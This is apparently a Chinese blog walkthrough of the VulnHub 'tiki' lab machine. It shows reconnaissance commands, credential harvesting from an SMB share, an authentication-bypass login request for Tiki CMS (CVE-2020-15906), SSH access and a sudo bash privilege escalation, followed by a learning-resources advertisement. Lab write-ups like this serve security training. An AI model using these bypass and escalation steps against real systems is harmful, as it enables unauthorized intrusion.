vulnhub靶场之tiki靶机

vulnhub靶场之tiki靶机

前言

靶机:tiki靶机,IP地址为192.168.10.8

攻击:kali,IP地址为192.168.10.6

靶机采用virtualbox,攻击机采用VMware虚拟机,都采用桥接网卡模式

文章涉及的靶机及工具,都可以自行访问官网或者项目地址进行获取,或者通过网盘链接下载 https://pan.quark.cn/s/89225ca07839

主机发现

也就是相当于现实环境中去发现确定主机的ip地址,因为这里是靶机环境,所以跳过了从域名到ip地址的过程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

当然也可以使用nmap等工具进行

arp-scan -l

null

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的tcp端口的开放情况

nmap -sT --min-rate=1000 192.168.10.8 -p- -oA nmap-tcp

null

再扫描udp端口的开放情况

nmap -sU --min-rate=1000 192.168.10.8 --top-ports 20 -oA nmap-udp

null

可以看到明确开放的udp端口没有,所以下面对tcp端口进行一个筛选

ports=`grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`

null

进一步对这些端口进行服务、系统等探测

nmap -sV -O -sC 192.168.10.8 -p $ports --min-rate=1000 -oA detail

null

null

再使用nmap的漏洞检测脚本对这些端口进行探测

nmap --script=vuln 192.168.10.8 -p $ports -oA vuln

null

SMB探测

使用enum4linux枚举用户等信息

enum4linux 192.168.10.8 -a

null

null

也可以直接使用smbclient探测多少分享

smbclient -L //192.168.10.8 -N

null

使用smbclient连接目标的Notes,以无密码连接,发现Mail.txt

smbclient //192.168.10.8/Notes -N

smb: >\ prompt    #关闭交互    
smb: >\ recurse    #开启递归
smb: \> mget *    #下载所有

null

查看这个文件

null

从中可以知道,用户名silky和密码51lky571k1

网站信息探测

访问80端口界面,是apache安装后的默认界面

null

之前nmap扫描出了一个目录/tiki,不过这里还是使用相关的工具再次进行目录爆破

gobuster dir -u http://192.168.10.8 -w /usr/share/wordlists/dirb/big.txt -b 404 -x php,html,txt,md

null

访问robots.txt,可以发现一个目录/tiki

null

访问这个目录,可以看到有登录框,结合前面获取的用户名和密码,可能就是CMS的用户名和密码

null

先不登录,使用whatweb或浏览器插件wappalyzer查看配置

whatweb http://192.168.10.8/tiki -v

null

以用户名silky和密码51lky571k1登录成功

登录后进行网站测试,在列表文件发现一个文章,点击后,发现说是有这些东西

null

再点击history进行查看,看到由admin编写的,并且在版本2的查看时,发现具体的cve编号了CVE-2020-15906

null

使用浏览器搜索对应的cve编号,可以发现描述

null

从这个描述可以得知,目标靶机的CMS版本应该是在21.2之前的

CVE-2020-15906漏洞利用

使用searchsploit搜索适应的漏洞,当然,其实在github上等都要该漏洞的利用

null

第二个版本比较符号,就是绕过身份认证,查看这个py脚本

null

所以说,就是要多次爆破,也就是多次请求,以错误的admin的密码测试

直到Account requires administrator approval.出现在界面,说明可以以空密码登录admin

这里可以借助这个脚本,或者使用burp等工具爆破都行,不过最后都使用burp抓取数据包然后进行修改,把pass的值改为空即可,大概如下

ticket=GiLYjkmMUPV0sXO6HYzPpkCfi0AFtto9veYSuW2MiBs&user=admin+&pass=+&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

null

当抓取后,修改再转发,这里是为了截图,所以找的burp的代理历史记录。

转发后即可发现以admin的身份登录成功了

null

按照之前还是点击查看,发现一个文件名称很是吸引

null

点击credentials发现了一组凭据,是silky的。silky:Agy8Y7SPJNXQzqA

null

当然这里我也测试了很多功能点,发现了文件上传,但是上传的php文件,无法解析为php文件,而是直接下载,所以这个凭据应该就是ssh连接

ssh silky@192.168.10.8

null

提权

这里先说明,对于靶机内的信息收集,我做了省略,因为这里sudo -l可以直接提权了,所以一些步骤就不写了,但是要知道哦。

登录后,对于靶机,我直接搜集SUID权限的文件

find / -perm -4000 -print 2>/dev/null

null

发现sudo,尝试sudo -l,也知道用户silky的密码,所以直接就能测试出,发现所有的命令都可以提权。

sudo -l

null

直接进行提权

sudo /bin/bash -p

null

查看最终flag

cd /root
cat flag.txt

null

总结

该靶机从头到尾的重点就是CVE-2020-15906漏洞,就是tiki的CMS漏洞。构造路线如下:

SMB服务---->网站信息获取---->CVE漏洞利用---->获取ssh凭证---->sduo提权

黑客/网络安全学习路线

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

下面给大家分享一份2025最新版的网络安全学习路线资料,帮助新人小白更系统、更快速的学习黑客技术!

一、2025最新网络安全学习路线

一个明确的学习路线可以帮助新人了解从哪里开始,按照什么顺序学习,以及需要掌握哪些知识点。

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

读者福利 | CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

我们把学习路线分成L1到L4四个阶段,一步步带你从入门到进阶,从理论到实战。


在这里插入图片描述

L1级别:网络安全的基础入门

L1阶段:我们会去了解计算机网络的基础知识,以及网络安全在行业的应用和分析;学习理解安全基础的核心原理,关键技术,以及PHP编程基础;通过证书考试,可以获得NISP/CISP。可就业安全运维工程师、等保测评工程师。


在这里插入图片描述

L2级别:网络安全的技术进阶

L2阶段我们会去学习渗透测试:包括情报收集、弱口令与口令爆破以及各大类型漏洞,还有漏洞挖掘和安全检查项目,可参加CISP-PTE证书考试。


在这里插入图片描述

L3级别:网络安全的高阶提升

L3阶段:我们会去学习反序列漏洞、RCE漏洞,也会学习到内网渗透实战、靶场实战和技术提取技术,系统学习Python编程和实战。参加CISP-PTE考试。


在这里插入图片描述

L4级别:网络安全的项目实战

L4阶段:我们会更加深入进行实战训练,包括代码审计、应急响应、红蓝对抗以及SRC的挖掘技术。并学习CTF夺旗赛的要点和刷题


在这里插入图片描述

整个网络安全学习路线L1主要是对计算机网络安全的理论基础的一个学习掌握;而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。

二、技术文档和经典PDF书籍

书籍和学习文档资料是学习网络安全过程中必不可少的,我自己整理技术文档,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,(书籍含电子版PDF)


在这里插入图片描述

三、网络安全视频教程

对于很多自学或者没有基础的同学来说,书籍这些纯文字类的学习教材会觉得比较晦涩难以理解,因此,我们提供了丰富的网安视频教程,以动态、形象的方式展示技术概念,帮助你更快、更轻松地掌握核心知识

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。


在这里插入图片描述

四、网络安全护网行动/CTF比赛

学以致用 ,当你的理论知识积累到一定程度,就需要通过项目实战,在实际操作中检验和巩固你所学到的知识,同时为你找工作和职业发展打下坚实的基础。


在这里插入图片描述

五、网络安全工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

面试不仅是技术的较量,更需要充分的准备。

在你已经掌握了技术之后,就需要开始准备面试,我们将提供精心整理的网安面试题库,涵盖当前面试中可能遇到的各种技术问题,让你在面试中游刃有余。

如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…


在这里插入图片描述


img

**读者福利 |** CSDN大礼包:《网络安全入门&进阶学习资源包》免费分享 (安全链接,放心点击)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值